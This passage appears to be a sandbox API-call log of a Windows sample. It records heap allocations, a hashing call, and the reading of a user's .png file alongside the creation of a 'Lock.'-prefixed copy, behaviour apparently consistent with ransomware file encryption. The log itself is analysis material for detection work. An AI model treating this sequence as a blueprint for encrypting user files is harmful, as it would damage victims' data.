PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.514] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.514] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.514] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.514] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.514] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.514] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0149.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7040, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0149.514] CryptDestroyHash (hHash=0x9e2138) returned 1 [0149.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0149.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0149.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0149.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0149.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0149.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/PN5TTWYWv642BYt.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pn5ttwywv642byt.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0149.516] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.516] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0149.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0149.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0149.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0149.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0149.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0149.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.518] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0149.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0149.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0149.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0149.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.518] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.PN5TTWYWv642BYt.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.pn5ttwywv642byt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0149.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0149.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0149.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0149.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0149.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0149.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0149.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0149.520] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd7020 [0149.523] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0149.523] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0149.525] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x7b50, lpOverlapped=0x0) returned 1 [0149.526] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0149.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17b50) returned 0x2aaf410 [0149.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd7020 | out: hHeap=0x2af0000) returned 1 [0149.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17b50) returned 0x2ac6f68 [0149.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0149.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.535] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17b50) returned 0x2aaf410 [0149.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0149.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0149.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0149.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0149.538] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0149.538] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0149.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0149.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17b50) returned 0x2aaf410 [0149.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0149.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa108 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0149.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0149.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17b50) returned 0x37c0048 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0149.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 